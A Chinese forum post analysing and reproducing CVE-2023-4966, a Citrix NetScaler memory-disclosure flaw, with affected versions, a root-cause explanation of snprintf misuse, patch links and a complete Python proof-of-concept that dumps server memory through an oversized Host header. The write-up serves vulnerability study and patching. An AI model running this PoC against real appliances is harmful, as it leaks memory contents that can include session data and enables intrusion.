ToB企服应用市场:ToB评测及商务社交产业平台

标题: 漏洞复现-Citrix 信息泄露漏洞分析（CVE-2023-4966） [打印本页]

---

作者: 王海鱼    时间: 2024-10-14 07:59
标题: 漏洞复现-Citrix 信息泄露漏洞分析（CVE-2023-4966）
1.漏洞形貌

Citrix Systems Citrix NetScaler Gateway（Citrix Systems Gateway）和Citrix Systems NetScaler ADC都是美国思杰体系（Citrix Systems）公司的产品。
NetScaler ADC和NetScaler Gateway存在安全漏洞，该漏洞源于存在敏感信息泄露。
2.影响版本

• NetScaler ADC and NetScaler Gateway 14.1 < 14.1-8.50
  
• NetScaler ADC and NetScaler Gateway 13.1 < 13.1-49.15
  
• NetScaler ADC and NetScaler Gateway 13.0 < 13.0-92.19
  
• NetScaler ADC 13.1-FIPS < 13.1-37.164
  
• NetScaler ADC 12.1-FIPS < 12.1-55.300
  
• NetScaler ADC 12.1-NDcPP < 12.1-55.300
  

3.影响范围

4.漏洞分析

1. 这里以 13.0-47 的固件为例子， 从固件拉出 nsppe 这个程序，用 IDA 打开分析。 搜索文章提到的字符串可以看到如下代码：

复制代码

1. snprintf函数被用于将hostname参数拼接到print_temp_rule变量中，并根据返回的长度，通过ns_vpn_send_response函数返回HTTP请求的结果。这种对snprintf的使用方法是一个常见的错误。这里的hostname参数是由 HTTP 请求中的 Host 头决定的,因此这个参数的长度我们是完全可以控制的。

复制代码

1. snprintf 这个函数应该返回的是 ”想要写入buffer 的字符串长度“ ， 而不是实际写入buffer的字符长长度。可以从一个 DEMO 看出这个效果：

复制代码

1. 可以看到，当我想写入 16长度的字符串的时候， n2的值为 16， 而不是实际写入的长度。

复制代码

1. 另外到达这个函数的路由，通过对这个函数 ns_aaa_oauth_send_openid_config
2. 进行交叉引用一下子就看到了：

复制代码

1. Poc:

复制代码

1. #!/usr/bin/env python3
3. import sys
4. import requests
5. import urllib3
6. import argparse
7. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9. parser = argparse.ArgumentParser()
10. parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
11. args = parser.parse_args()
13. if args.target is None:
14.     print('Target must be provided (e.g. --target 192.168.1.200)')
15.     sys.exit(0)
17. hostname = args.target
19. if __name__ == "__main__":
20.     headers = {
21.         "Host": "a"*24576
22.     }
23.     r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
24.     if r.status_code == 200:
25.         print("--- Dumped Memory ---")
26.         print(r.text[131050:])
27.         print("---      End      ---")
28.     else:
29.         print("Could not dump memory")

复制代码

5.修复建议

• 官方升级
  

现在官方已发布安全版本修复此漏洞，建议受影响的用户实时升级防护：
https://www.citrix.com/downloads/citrix-gateway/
https://www.citrix.com/downloads/citrix-adc/

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4